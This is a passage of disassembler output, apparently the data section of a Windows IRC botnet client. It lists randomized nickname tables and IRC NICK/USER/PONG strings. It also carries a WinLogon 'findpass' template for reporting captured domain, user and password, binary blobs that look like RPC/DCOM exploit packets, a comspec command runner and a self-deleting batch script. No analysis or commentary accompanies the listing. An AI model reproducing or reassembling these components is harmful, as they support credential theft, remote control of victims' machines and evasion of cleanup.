db 3, 34h, 2
dd 646E6966h, 73736170h, 202D0302h, 4C6E6957h, 6E6F676Fh
dd 666E4920h, 616D726Fh, 6E6F6974h, 49502820h, 64252044h
dd 202D2029h, 6D6F4402h, 26E6961h, 5C5C203Ah, 202C5325h
dd 65735502h, 203A0272h, 2F532528h, 295325h
; char asc_438714[]
asc_438714 db '-' ; DATA XREF: sub_417990+E1�o
db 3, 34h, 2
dd 646E6966h, 73736170h, 202D0302h, 4C6E6957h, 6E6F676Fh
dd 666E4920h, 616D726Fh, 6E6F6974h, 49502820h, 64252044h
dd 202D2029h, 6D6F4402h, 26E6961h, 5C5C203Ah, 202C5325h
dd 65735502h, 203A0272h, 2F532528h, 412F4E28h, 2929h
; char *off_438768
off_438768 dd offset aQ ; DATA XREF: sub_417E84+5C�r
; "q"
dd offset dword_439318
dd offset aE ; "e"
dd offset aR ; "r"
dd offset aT ; "t"
dd offset dword_439314
dd offset aU ; "u"
dd offset aI ; "i"
dd offset aP ; "p"
dd offset aA ; "a"
dd offset aS_5 ; "s"
dd offset dword_439310
dd offset dword_43930C
dd offset dword_439308
dd offset dword_439304
dd offset aJ ; "j"
dd offset aK ; "k"
dd offset dword_439300
dd offset dword_4392FC
dd offset dword_4392F8
dd offset aC ; "c"
dd offset aV ; "v"
dd offset dword_4392F4
dd offset aN ; "n"
dd offset aM_0 ; "m"
dd offset dword_4392F0
dd offset dword_4392EC
dd offset dword_4392E8
dd offset dword_4392E4
dd offset dword_4392E0
dd offset word_4392DC
dd offset dword_4392D8
dd offset aI_0 ; "I"
dd offset dword_4392D4
dd offset dword_4392D0
dd offset aA_0 ; "A"
dd offset dword_4392CC
dd offset dword_4392C8
dd offset dword_4392C4
dd offset dword_4392C0
dd offset dword_4392BC
dd offset dword_4392B8
dd offset dword_4392B4
dd offset dword_4392B0
dd offset dword_4392AC
dd offset dword_4392A8
dd offset dword_4392A4
dd offset dword_4392A0
dd offset dword_43929C
dd offset word_439298
dd offset aM_1 ; "M"
dd offset aSmartmir ; "SMARTMIR"
dd offset aFarooq ; "farooq"
dd offset aMaxxguy ; "maxxguy"
dd offset aBobmarley ; "BOBMARLEY"
dd offset aEmilya ; "emilya"
dd offset aKrizha ; "KRIZHA"
dd offset aCar1nna ; "Car1nna"
dd offset aSwin ; "swin"
dd offset aMale ; "male"
dd offset aKoko ; "koko"
dd offset aFlexster ; "flexster"
dd offset aKen ; "ken"
dd offset aShez ; "Shez"
dd offset aTalika ; "talika"
dd offset aMarcy ; "marcy"
dd offset aCme ; "cme"
dd offset aHeval ; "heval"
dd offset aBunty ; "bunty"
dd offset aJanno ; "janno"
dd offset aRimpy ; "rimpy"
dd offset aNastysha ; "nastysha"
dd offset aLuisa ; "Luisa"
dd offset aTroller ; "troller"
dd offset aManee ; "manee"
dd offset aKermit ; "kermit"
dd offset aPuregold ; "puregold"
dd offset aCoredump ; "CoreDump"
dd offset aImra ; "imra"
dd offset aGirl ; "GirL"
dd offset aCamel ; "CAMEL"
dd offset aReshma ; "reshma"
dd offset aKencing ; "Kencing"
dd offset aThr45h3r5 ; "THR45H3R5"
dd offset aCansuuuu ; "cansuuuu"
dd offset aKaan38dent ; "kaan38dent"
dd offset aErkan27 ; "erkan27"
dd offset aHexaaa ; "hexaaa"
dd offset aBerk19 ; "berk19"
dd offset aObenibisevse ; "OBeNiBiSeVSe"
dd offset aIrmal ; "irmal"
dd offset aMisssunday ; "misssunday"
dd offset aTolga34 ; "Tolga34"
dd offset aJericho ; "JERICHO"
dd offset aMary_0 ; "MARY"
dd offset aAkin ; "AKIN"
dd offset aMelekk ; "melekk"
dd offset aTrend3 ; "trend3"
dd offset aMERVE ; "M-E-R-V-E"
dd offset aTekir ; "tekir"
dd offset aVenedik34 ; "venedik34"
dd offset aSevmekmi ; "sevmekmi"
dd offset aSudenur ; "SUDENUR"
dd offset aArzu ; "ARZU"
dd offset aHaticem ; "haticem"
dd offset aErnesto ; "ERNESTO"
dd offset aAslii ; "aslii"
dd offset aPiramit ; "PIRAMIT"
dd offset aSamyeli21 ; "samyeli21"
dd offset aRetg ; "RETG"
dd offset aBlackpearl ; "blackpearl"
dd offset aPelincik ; "pelincik"
dd offset aAhmet ; "ahmet"
dd offset aTurkyy ; "turkyy"
dd offset aAnk32m ; "ank32m"
dd offset aZack ; "ZACK"
dd offset aIzmir39m ; "Izmir39m"
dd offset aAlbina ; "albina"
dd offset aAyla ; "AYLA-"
dd offset off_43902C
dd offset aAnkh ; "ankh"
dd offset aDonjuanm ; "Donjuanm"
dd offset aBogac ; "bogac"
dd offset aAlpay34m ; "alpay34m"
dd offset aCongueror ; "CoNGuERoR"
dd offset aDenizlim ; "DenizliM"
dd offset aBerk19m ; "Berk19m"
dd offset aDevran ; "devran"
dd offset aArda ; "arda"
dd offset aKeyiflisert ; "keyifliSERT"
dd offset aMurat34M ; "murat34-m"
dd offset aHakan3 ; "hakan3"
dd offset aImirzali ; "IMIRZALI--"
dd offset aRamtha ; "RAMTHA"
dd offset aEmre ; "Emre--"
dd offset aElmaazyok ; "elmaazyok"
dd offset aEsmerkiz ; "Esmerkiz"
dd offset aKebikec ; "kebikec"
dd offset aFlord ; "FLoRD"
dd offset aHoly ; "holy"
dd offset aMahinur ; "MAHINUR"
dd offset aSadikaellesme ; "SaDIkaEllesme"
dd offset aAykut1 ; "aykut1"
dd offset aKashmira ; "Kashmira"
dd offset aSeviseli ; "SeViSeLi"
dd offset aSugarboy ; "SUGARBOY-"
dd offset aUzgun36 ; "uzgun36"
dd offset aKumul ; "kumul"
dd offset aAdalim ; "ADALIM"
dd offset aUmut ; "umut-"
dd offset aAnk32M ; "ANK-32-M"
dd offset aDjspace ; "DJSPACE"
dd offset aAnkar ; "Ankar"
dd offset aFenerlee ; "FeNeRLee"
dd offset aHayran ; "hayran"
dd offset aAngelgirl ; "angelgirl"
dd offset aKapk ; "kapk"
dd offset aAchilles ; "Achilles"
dd offset aTegmen ; "TEGMEN"
dd offset aKotan ; "kotan"
dd offset aSevda ; "sevda"
dd offset off_438E98
dd offset aAlcatras ; "alcatras"
dd offset aA44m ; "a44m"
dd offset aBirsen ; "birsen"
dd offset aYabanc ; "yabanc"
dd offset aDevre ; "devre"
dd offset aErkan ; "erkan"
dd offset aAnkm ; "ankM"
dd offset aAdem28 ; "Adem28"
dd offset aMaxsilla ; "maxsilla"
dd offset aM41ist ; "M41IST"
dd offset aAdamm33 ; "AdAMM33"
dd offset aFirtina ; "firtina"
dd offset aAta29 ; "Ata29"
dd offset aKoray ; "KORAY"
dd offset aAkden ; "akden"
dd offset aIzmirlm ; "izmirlm"
dd offset aUla ; "ula"
dd offset aNeHaber ; "NE-HABER"
dd offset aPassenger ; "passenger"
dd offset aTropikal ; "tropikal"
dd offset aCool30m ; "cool30m"
dd offset aCem39 ; "cem39"
dd offset aRerpjj ; "RERPJJ"
dd offset aTeoman ; "TEOMAN```"
dd offset aDallas43m ; "DALLAS43M"
dd offset aPrometheus ; "prometheus"
dd offset aMaveRIck ; "MaVe{R}icK"
dd offset aAdamm ; "ADAMM"
dd offset aCumhur29 ; "cumhur29"
dd offset aWantedlove ; "WANTEDLOVE"
; char *off_438A68
off_438A68 dd offset aSex ; DATA XREF: sub_417E84+41�r
; sub_417E84+EC�r
; "sex"
dd offset aLez ; "lez"
dd offset aZex ; "zex"
dd offset aTree ; "tree"
dd offset aBad ; "bad"
dd offset aLag ; "lag"
dd offset aTambe ; "|tambe|"
dd offset aWoh ; "|woh|"
dd offset aTot ; "-|tot|"
dd offset aSuck ; "|suck|"
dd offset aLuck ; "|luck|"
dd offset aHub ; "{hub}"
dd offset aSex_0 ; "{sex}"
dd offset aGens ; "{gens|"
dd offset aLuvuF ; "||luvu-f|"
dd offset aWiked ; "|wiked|"
dd offset aSick ; "sick}}"
dd offset aQ8 ; "Q8"
dd offset aQ8A ; "|q8|a"
dd offset dword_4392F4
dd offset aC ; "c"
dd offset dword_439310
dd offset aE ; "e"
dd offset dword_43930C
dd offset dword_439308
dd offset dword_439304
dd offset aI ; "i"
dd offset a_ ; "_"
dd offset aJ ; "j"
dd offset aK ; "k"
dd offset dword_439300
dd offset aM_0 ; "m"
dd offset aN ; "n"
dd offset aO ; "o"
dd offset aP ; "p"
dd offset aQ ; "q"
dd offset aRs ; "rs"
dd offset aT ; "t"
dd offset aU ; "u"
dd offset aV ; "v"
dd offset dword_439318
dd offset dword_4392F8
dd offset dword_439314
dd offset dword_4392FC
dd offset aHappy ; "happy"
dd offset aRg ; "rg"
dd offset aTy ; "ty"
dd offset aGf ; "gf"
dd offset aRt ; "rt"
dd offset aSdf ; "sdf"
dd offset aUi ; "ui"
dd offset aLuvy ; "luvy"
dd offset aTrimy ; "trimy"
dd offset aTruck ; "truck"
dd offset aMuckc ; "muckc"
dd offset dword_4392FC
dd offset dword_439308
dd offset aS_5 ; "s"
dd offset aQ ; "q"
dd offset off_438CB8
dd offset aBbl ; "|bbl"
dd offset byte_43DB88
dd offset byte_43DB88
dd offset a___0 ; "_|_"
dd offset byte_43DB88
dd offset byte_43DB88
dd offset byte_43DB88
dd offset byte_43DB88
dd offset dword_4392C4
dd offset aM_1 ; "M"
dd offset aLuvu ; "LUVU"
dd offset aSad ; "Sad"
dd offset aF_3 ; "^^^f^"
dd offset dword_4392F4
dd offset byte_43DB88
dd offset aSleeping ; "Sleeping"
dd offset byte_43DB88
dd offset byte_43DB88
dd offset aFuck_0 ; "Fuck"
dd offset aFree ; "Free"
dd offset byte_43DB88
dd offset byte_43DB88
dd offset dword_4392A8
dd offset byte_43DB88
dd offset aBoy ; "BOY"
dd offset aGirl_0 ; "GIRL"
dd offset aGurl ; "gurl"
dd offset aShit ; "shit"
dd offset aAha ; "aha"
dd offset aYeah ; "yeah"
dd offset aMuha ; "muha"
dd offset aMof0 ; "mof0"
dd offset aMofo ; "mofo"
dd offset aTot_0 ; "tot"
dd offset aLol ; "lol"
dd offset aLoloA ; "lolo|a|"
dd offset aSex4free ; "|sex4free|"
dd offset a4us ; "|4us|"
dd offset a4you ; "{4you}"
dd offset a4u ; "|4u|"
dd offset dword_438C04
dd offset dword_438C00
dword_438C00 dd 7536h ; DATA XREF: .data:00438BFC�o
dword_438C04 dd 7535h ; DATA XREF: .data:00438BF8�o
a4u db '|4u|',0 ; DATA XREF: .data:00438BF4�o
align 10h
a4you db '{4you}',0 ; DATA XREF: .data:00438BF0�o
align 4
a4us db '|4us|',0 ; DATA XREF: .data:00438BEC�o
align 10h
aSex4free db '|sex4free|',0 ; DATA XREF: .data:00438BE8�o
align 4
aLoloA db 'lolo|a|',0 ; DATA XREF: .data:00438BE4�o
aLol db 'lol',0 ; DATA XREF: .data:00438BE0�o
aTot_0 db 'tot',0 ; DATA XREF: .data:00438BDC�o
aMofo db 'mofo',0 ; DATA XREF: .data:00438BD8�o
align 4
aMof0 db 'mof0',0 ; DATA XREF: .data:00438BD4�o
align 4
aMuha db 'muha',0 ; DATA XREF: .data:00438BD0�o
align 4
aYeah db 'yeah',0 ; DATA XREF: .data:00438BCC�o
align 4
aAha db 'aha',0 ; DATA XREF: .data:00438BC8�o
aShit db 'shit',0 ; DATA XREF: .data:00438BC4�o
align 4
aGurl db 'gurl',0 ; DATA XREF: .data:00438BC0�o
align 10h
aGirl_0 db 'GIRL',0 ; DATA XREF: .data:00438BBC�o
align 4
aBoy db 'BOY',0 ; DATA XREF: .data:00438BB8�o
aFree db 'Free',0 ; DATA XREF: .data:00438BA4�o
align 4
aFuck_0 db 'Fuck',0 ; DATA XREF: .data:00438BA0�o
align 4
aSleeping db 'Sleeping',0 ; DATA XREF: .data:00438B94�o
align 4
aF_3 db '^^^f^',0 ; DATA XREF: .data:00438B88�o
align 10h
aSad db 'Sad',0 ; DATA XREF: .data:00438B84�o
aLuvu db 'LUVU',0 ; DATA XREF: .data:00438B80�o
align 4
a___0 db '_|_',0 ; DATA XREF: .data:00438B64�o
aBbl db '|bbl',0 ; DATA XREF: .data:00438B58�o
align 4
off_438CB8 dd offset loc_425240+2 ; DATA XREF: .data:00438B54�o
aMuckc db 'muckc',0 ; DATA XREF: .data:00438B40�o
align 4
aTruck db 'truck',0 ; DATA XREF: .data:00438B3C�o
align 4
aTrimy db 'trimy',0 ; DATA XREF: .data:00438B38�o
align 4
aLuvy db 'luvy',0 ; DATA XREF: .data:00438B34�o
align 4
aUi db 'ui',0 ; DATA XREF: .data:00438B30�o
align 10h
aSdf db 'sdf',0 ; DATA XREF: .data:00438B2C�o
aRt db 'rt',0 ; DATA XREF: .data:00438B28�o
align 4
aGf db 'gf',0 ; DATA XREF: .data:00438B24�o
align 4
aTy db 'ty',0 ; DATA XREF: .data:00438B20�o
align 10h
aRg db 'rg',0 ; DATA XREF: .data:00438B1C�o
align 4
aHappy db 'happy',0 ; DATA XREF: .data:00438B18�o
align 4
aRs db 'rs',0 ; DATA XREF: .data:00438AF8�o
align 10h
aQ8A db '|q8|a',0 ; DATA XREF: .data:00438AB0�o
align 4
aQ8 db 'Q8',0 ; DATA XREF: .data:00438AAC�o
align 4
aSick db 'sick}}',0 ; DATA XREF: .data:00438AA8�o
align 4
aWiked db '|wiked|',0 ; DATA XREF: .data:00438AA4�o
aLuvuF db '||luvu-f|',0 ; DATA XREF: .data:00438AA0�o
align 4
aGens db '{gens|',0 ; DATA XREF: .data:00438A9C�o
align 10h
aSex_0 db '{sex}',0 ; DATA XREF: .data:00438A98�o
align 4
aHub db '{hub}',0 ; DATA XREF: .data:00438A94�o
align 10h
aLuck db '|luck|',0 ; DATA XREF: .data:00438A90�o
align 4
aSuck db '|suck|',0 ; DATA XREF: .data:00438A8C�o
align 10h
aTot db '-|tot|',0 ; DATA XREF: .data:00438A88�o
align 4
aWoh db '|woh|',0 ; DATA XREF: .data:00438A84�o
align 10h
aTambe db '|tambe|',0 ; DATA XREF: .data:00438A80�o
aLag db 'lag',0 ; DATA XREF: .data:00438A7C�o
aBad db 'bad',0 ; DATA XREF: .data:00438A78�o
aTree db 'tree',0 ; DATA XREF: .data:00438A74�o
align 4
aZex db 'zex',0 ; DATA XREF: .data:00438A70�o
aLez db 'lez',0 ; DATA XREF: .data:00438A6C�o
aWantedlove db 'WANTEDLOVE',0 ; DATA XREF: .data:00438A64�o
align 4
aCumhur29 db 'cumhur29',0 ; DATA XREF: .data:00438A60�o
align 4
aAdamm db 'ADAMM',0 ; DATA XREF: .data:00438A5C�o
align 10h
aMaveRIck db 'MaVe{R}icK',0 ; DATA XREF: .data:00438A58�o
align 4
aPrometheus db 'prometheus',0 ; DATA XREF: .data:00438A54�o
align 4
aDallas43m db 'DALLAS43M',0 ; DATA XREF: .data:00438A50�o
align 4
aTeoman db 'TEOMAN```',0 ; DATA XREF: .data:00438A4C�o
align 10h
aRerpjj db 'RERPJJ',0 ; DATA XREF: .data:00438A48�o
align 4
aCem39 db 'cem39',0 ; DATA XREF: .data:00438A44�o
align 10h
aCool30m db 'cool30m',0 ; DATA XREF: .data:00438A40�o
aTropikal db 'tropikal',0 ; DATA XREF: .data:00438A3C�o
align 4
aPassenger db 'passenger',0 ; DATA XREF: .data:00438A38�o
align 10h
aNeHaber db 'NE-HABER',0 ; DATA XREF: .data:00438A34�o
align 4
aUla db 'ula',0 ; DATA XREF: .data:00438A30�o
aIzmirlm db 'izmirlm',0 ; DATA XREF: .data:00438A2C�o
aAkden db 'akden',0 ; DATA XREF: .data:00438A28�o
align 10h
aKoray db 'KORAY',0 ; DATA XREF: .data:00438A24�o
align 4
aAta29 db 'Ata29',0 ; DATA XREF: .data:00438A20�o
align 10h
aFirtina db 'firtina',0 ; DATA XREF: .data:00438A1C�o
aAdamm33 db 'AdAMM33',0 ; DATA XREF: .data:00438A18�o
aM41ist db 'M41IST',0 ; DATA XREF: .data:00438A14�o
align 4
aMaxsilla db 'maxsilla',0 ; DATA XREF: .data:00438A10�o
align 4
aAdem28 db 'Adem28',0 ; DATA XREF: .data:00438A0C�o
align 4
aAnkm db 'ankM',0 ; DATA XREF: .data:00438A08�o
align 4
aErkan db 'erkan',0 ; DATA XREF: .data:00438A04�o
align 4
aDevre db 'devre',0 ; DATA XREF: .data:00438A00�o
align 4
aYabanc db 'yabanc',0 ; DATA XREF: .data:004389FC�o
align 4
aBirsen db 'birsen',0 ; DATA XREF: .data:004389F8�o
align 4
aA44m db 'a44m',0 ; DATA XREF: .data:004389F4�o
align 4
aAlcatras db 'alcatras',0 ; DATA XREF: .data:004389F0�o
align 4
off_438E98 dd offset byte_4B5245 ; DATA XREF: .data:004389EC�o
aSevda db 'sevda',0 ; DATA XREF: .data:004389E8�o
align 4
aKotan db 'kotan',0 ; DATA XREF: .data:004389E4�o
align 4
aTegmen db 'TEGMEN',0 ; DATA XREF: .data:004389E0�o
align 4
aAchilles db 'Achilles',0 ; DATA XREF: .data:004389DC�o
align 10h
aKapk db 'kapk',0 ; DATA XREF: .data:004389D8�o
align 4
aAngelgirl db 'angelgirl',0 ; DATA XREF: .data:004389D4�o
align 4
aHayran db 'hayran',0 ; DATA XREF: .data:004389D0�o
align 4
aFenerlee db 'FeNeRLee',0 ; DATA XREF: .data:004389CC�o
align 4
aAnkar db 'Ankar',0 ; DATA XREF: .data:004389C8�o
align 10h
aDjspace db 'DJSPACE',0 ; DATA XREF: .data:004389C4�o
aAnk32M db 'ANK-32-M',0 ; DATA XREF: .data:004389C0�o
align 4
aUmut db 'umut-',0 ; DATA XREF: .data:004389BC�o
align 4
aAdalim db 'ADALIM',0 ; DATA XREF: .data:004389B8�o
align 4
aKumul db 'kumul',0 ; DATA XREF: .data:004389B4�o
align 4
aUzgun36 db 'uzgun36',0 ; DATA XREF: .data:004389B0�o
aSugarboy db 'SUGARBOY-',0 ; DATA XREF: .data:004389AC�o
align 10h
aSeviseli db 'SeViSeLi',0 ; DATA XREF: .data:004389A8�o
align 4
aKashmira db 'Kashmira',0 ; DATA XREF: .data:004389A4�o
align 4
aAykut1 db 'aykut1',0 ; DATA XREF: .data:004389A0�o
align 10h
aSadikaellesme db 'SaDIkaEllesme',0 ; DATA XREF: .data:0043899C�o
align 10h
aMahinur db 'MAHINUR',0 ; DATA XREF: .data:00438998�o
aHoly db 'holy',0 ; DATA XREF: .data:00438994�o
align 10h
aFlord db 'FLoRD',0 ; DATA XREF: .data:00438990�o
align 4
aKebikec db 'kebikec',0 ; DATA XREF: .data:0043898C�o
aEsmerkiz db 'Esmerkiz',0 ; DATA XREF: .data:00438988�o
align 4
aElmaazyok db 'elmaazyok',0 ; DATA XREF: .data:00438984�o
align 4
aEmre db 'Emre--',0 ; DATA XREF: .data:00438980�o
align 10h
aRamtha db 'RAMTHA',0 ; DATA XREF: .data:0043897C�o
align 4
aImirzali db 'IMIRZALI--',0 ; DATA XREF: .data:00438978�o
align 4
aHakan3 db 'hakan3',0 ; DATA XREF: .data:00438974�o
align 4
aMurat34M db 'murat34-m',0 ; DATA XREF: .data:00438970�o
align 4
aKeyiflisert db 'keyifliSERT',0 ; DATA XREF: .data:0043896C�o
aArda db 'arda',0 ; DATA XREF: .data:00438968�o
align 4
aDevran db 'devran',0 ; DATA XREF: .data:00438964�o
align 4
aBerk19m db 'Berk19m',0 ; DATA XREF: .data:00438960�o
aDenizlim db 'DenizliM',0 ; DATA XREF: .data:0043895C�o
align 4
aCongueror db 'CoNGuERoR',0 ; DATA XREF: .data:00438958�o
align 4
aAlpay34m db 'alpay34m',0 ; DATA XREF: .data:00438954�o
align 10h
aBogac db 'bogac',0 ; DATA XREF: .data:00438950�o
align 4
aDonjuanm db 'Donjuanm',0 ; DATA XREF: .data:0043894C�o
align 4
aAnkh db 'ankh',0 ; DATA XREF: .data:00438948�o
align 4
off_43902C dd offset byte_457441 ; DATA XREF: .data:00438944�o
aAyla db 'AYLA-',0 ; DATA XREF: .data:00438940�o
align 4
aAlbina db 'albina',0 ; DATA XREF: .data:0043893C�o
align 10h
aIzmir39m db 'Izmir39m',0 ; DATA XREF: .data:00438938�o
align 4
aZack db 'ZACK',0 ; DATA XREF: .data:00438934�o
align 4
aAnk32m db 'ank32m',0 ; DATA XREF: .data:00438930�o
align 4
aTurkyy db 'turkyy',0 ; DATA XREF: .data:0043892C�o
align 4
aAhmet db 'ahmet',0 ; DATA XREF: .data:00438928�o
align 4
aPelincik db 'pelincik',0 ; DATA XREF: .data:00438924�o
align 4
aBlackpearl db 'blackpearl',0 ; DATA XREF: .data:00438920�o
align 4
aRetg db 'RETG',0 ; DATA XREF: .data:0043891C�o
align 4
aSamyeli21 db 'samyeli21',0 ; DATA XREF: .data:00438918�o
align 4
aPiramit db 'PIRAMIT',0 ; DATA XREF: .data:00438914�o
aAslii db 'aslii',0 ; DATA XREF: .data:00438910�o
align 4
aErnesto db 'ERNESTO',0 ; DATA XREF: .data:0043890C�o
aHaticem db 'haticem',0 ; DATA XREF: .data:00438908�o
aArzu db 'ARZU',0 ; DATA XREF: .data:00438904�o
align 10h
aSudenur db 'SUDENUR',0 ; DATA XREF: .data:00438900�o
aSevmekmi db 'sevmekmi',0 ; DATA XREF: .data:004388FC�o
align 4
aVenedik34 db 'venedik34',0 ; DATA XREF: .data:004388F8�o
align 10h
aTekir db 'tekir',0 ; DATA XREF: .data:004388F4�o
align 4
aMERVE db 'M-E-R-V-E',0 ; DATA XREF: .data:004388F0�o
align 4
aTrend3 db 'trend3',0 ; DATA XREF: .data:004388EC�o
align 4
aMelekk db 'melekk',0 ; DATA XREF: .data:004388E8�o
align 4
aAkin db 'AKIN',0 ; DATA XREF: .data:004388E4�o
align 4
aMary_0 db 'MARY',0 ; DATA XREF: .data:004388E0�o
align 4
aJericho db 'JERICHO',0 ; DATA XREF: .data:004388DC�o
aTolga34 db 'Tolga34',0 ; DATA XREF: .data:004388D8�o
aMisssunday db 'misssunday',0 ; DATA XREF: .data:004388D4�o
align 10h
aIrmal db 'irmal',0 ; DATA XREF: .data:004388D0�o
align 4
aObenibisevse db 'OBeNiBiSeVSe',0 ; DATA XREF: .data:004388CC�o
align 4
aBerk19 db 'berk19',0 ; DATA XREF: .data:004388C8�o
align 10h
aHexaaa db 'hexaaa',0 ; DATA XREF: .data:004388C4�o
align 4
aErkan27 db 'erkan27',0 ; DATA XREF: .data:004388C0�o
aKaan38dent db 'kaan38dent',0 ; DATA XREF: .data:004388BC�o
align 4
aCansuuuu db 'cansuuuu',0 ; DATA XREF: .data:004388B8�o
align 4
aThr45h3r5 db 'THR45H3R5',0 ; DATA XREF: .data:004388B4�o
align 4
aKencing db 'Kencing',0 ; DATA XREF: .data:004388B0�o
aReshma db 'reshma',0 ; DATA XREF: .data:004388AC�o
align 4
aCamel db 'CAMEL',0 ; DATA XREF: .data:004388A8�o
align 4
aGirl db 'GirL',0 ; DATA XREF: .data:004388A4�o
align 4
aImra db 'imra',0 ; DATA XREF: .data:004388A0�o
align 4
aCoredump db 'CoreDump',0 ; DATA XREF: .data:0043889C�o
align 4
aPuregold db 'puregold',0 ; DATA XREF: .data:00438898�o
align 4
aKermit db 'kermit',0 ; DATA XREF: .data:00438894�o
align 4
aManee db 'manee',0 ; DATA XREF: .data:00438890�o
align 4
aTroller db 'troller',0 ; DATA XREF: .data:0043888C�o
aLuisa db 'Luisa',0 ; DATA XREF: .data:00438888�o
align 4
aNastysha db 'nastysha',0 ; DATA XREF: .data:00438884�o
align 10h
aRimpy db 'rimpy',0 ; DATA XREF: .data:00438880�o
align 4
aJanno db 'janno',0 ; DATA XREF: .data:0043887C�o
align 10h
aBunty db 'bunty',0 ; DATA XREF: .data:00438878�o
align 4
aHeval db 'heval',0 ; DATA XREF: .data:00438874�o
align 10h
aCme db 'cme',0 ; DATA XREF: .data:00438870�o
aMarcy db 'marcy',0 ; DATA XREF: .data:0043886C�o
align 4
aTalika db 'talika',0 ; DATA XREF: .data:00438868�o
align 4
aShez db 'Shez',0 ; DATA XREF: .data:00438864�o
align 4
aKen db 'ken',0 ; DATA XREF: .data:00438860�o
aFlexster db 'flexster',0 ; DATA XREF: .data:0043885C�o
align 4
aKoko db 'koko',0 ; DATA XREF: .data:00438858�o
align 4
aMale db 'male',0 ; DATA XREF: .data:00438854�o
align 4
aSwin db 'swin',0 ; DATA XREF: .data:00438850�o
align 4
aCar1nna db 'Car1nna',0 ; DATA XREF: .data:0043884C�o
aKrizha db 'KRIZHA',0 ; DATA XREF: .data:00438848�o
align 4
aEmilya db 'emilya',0 ; DATA XREF: .data:00438844�o
align 4
aBobmarley db 'BOBMARLEY',0 ; DATA XREF: .data:00438840�o
align 4
aMaxxguy db 'maxxguy',0 ; DATA XREF: .data:0043883C�o
aFarooq db 'farooq',0 ; DATA XREF: .data:00438838�o
align 4
aSmartmir db 'SMARTMIR',0 ; DATA XREF: .data:00438834�o
align 4
aM_1: ; DATA XREF: .data:00438830�o
; .data:00438B7C�o
unicode 0, <M>,0
word_439298 dw 4Eh ; DATA XREF: sub_41A3C6+38�r
; .data:0043882C�o
align 4
dword_43929C dd 42h ; DATA XREF: .data:00438828�o
dword_4392A0 dd 56h ; DATA XREF: .data:00438824�o
dword_4392A4 dd 43h ; DATA XREF: .data:00438820�o
dword_4392A8 dd 58h ; DATA XREF: .data:0043881C�o
; .data:00438BB0�o
dword_4392AC dd 5Ah ; DATA XREF: .data:00438818�o
dword_4392B0 dd 4Ch ; DATA XREF: .data:00438814�o
dword_4392B4 dd 4Bh ; DATA XREF: .data:00438810�o
dword_4392B8 dd 4Ah ; DATA XREF: .data:0043880C�o
dword_4392BC dd 48h ; DATA XREF: .data:00438808�o
dword_4392C0 dd 47h ; DATA XREF: .data:00438804�o
dword_4392C4 dd 46h ; DATA XREF: .data:00438800�o
; .data:00438B78�o
dword_4392C8 dd 44h ; DATA XREF: .data:004387FC�o
dword_4392CC dd 53h ; DATA XREF: .data:004387F8�o
dword_4392D0 dd 50h ; DATA XREF: .data:004387F0�o
dword_4392D4 dd 4Fh ; DATA XREF: .data:004387EC�o
dword_4392D8 dd 55h ; DATA XREF: .data:004387E4�o
word_4392DC dw 59h ; DATA XREF: sub_41A6EA+38�r
; .data:004387E0�o
align 10h
dword_4392E0 dd 54h ; DATA XREF: .data:004387DC�o
dword_4392E4 dd 52h ; DATA XREF: .data:004387D8�o
dword_4392E8 dd 45h ; DATA XREF: .data:004387D4�o
dword_4392EC dd 57h ; DATA XREF: .data:004387D0�o
dword_4392F0 dd 51h ; DATA XREF: .data:004387CC�o
dword_4392F4 dd 62h ; DATA XREF: .data:004387C0�o
; .data:00438AB4�o ...
dword_4392F8 dd 78h ; DATA XREF: .data:004387B4�o
; .data:00438B0C�o
dword_4392FC dd 7Ah ; DATA XREF: .data:004387B0�o
; .data:00438B14�o ...
dword_439300 dd 6Ch ; DATA XREF: .data:004387AC�o
; .data:00438AE0�o
dword_439304 dd 68h ; DATA XREF: .data:004387A0�o
; .data:00438ACC�o
dword_439308 dd 67h ; DATA XREF: .data:0043879C�o
; .data:00438AC8�o ...
dword_43930C dd 66h ; DATA XREF: .data:00438798�o
; .data:00438AC4�o
dword_439310 dd 64h ; DATA XREF: .data:00438794�o
; .data:00438ABC�o
dword_439314 dd 79h ; DATA XREF: .data:0043877C�o
; .data:00438B10�o
dword_439318 dd 77h ; DATA XREF: .data:0043876C�o
; .data:00438B08�o
; char aNickS_1[]
aNickS_1 db 'NICK %s',0Ah,0 ; DATA XREF: sub_417B76+B1�o
align 4
; char a432[]
a432 db '432',0 ; DATA XREF: sub_417B76+79�o
aPongS_0 db 'PONG %s',0Ah,0 ; DATA XREF: sub_417B76+61�o
align 4
; char aNickSUserSHotm[]
aNickSUserSHotm db 'NICK %s',0Ah ; DATA XREF: sub_417C61+9B�o
db 'USER %s "hotmail.com" "127.0.0.1" :%s',0Ah,0
align 4
; char a__1[]
a__1 db '-|`_\{[]}',0 ; DATA XREF: sub_417E84+BC�o
; sub_417E84+175�r ...
align 4
dword_439374 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 ; DATA XREF: sub_4182CD+A4�o
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_4393C0 dd 3000005h, 10h, 18h, 1, 3 dup(0) ; DATA XREF: sub_4182CD+E3�o
dword_4393DC dd 975201B0h, 11D059CAh, 0A000D5A8h, 51800DC9h, 0
; DATA XREF: sub_4182CD+118�o
dword_4393F0 dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
; DATA XREF: sub_4182CD+13F�o
; char aSErrorSD_[]
aSErrorSD_ db '%s Error: %s <%d>.',0 ; DATA XREF: sub_418699+72�o
align 4
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_4187E0+1C�o
align 4
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_418884+2�o
; char aComspecCSS[]
aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_4188A6+140�o
align 4
; char a[]
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_4188A6+85�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db 'del "%s"',0
; char aSdel_bat[]
aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_4188A6+48�o
align 4
; char asc_4394A4[]
asc_4394A4 db '-' ; DATA XREF: sub_418A2E+9C�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aOperatingSyste db '- operating system is not supported',0
align 4
unk_4394D4 db 2Dh ; - ; DATA XREF: sub_418A2E+8F�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aFailedWithErro db '- failed with error code %d',0
align 4
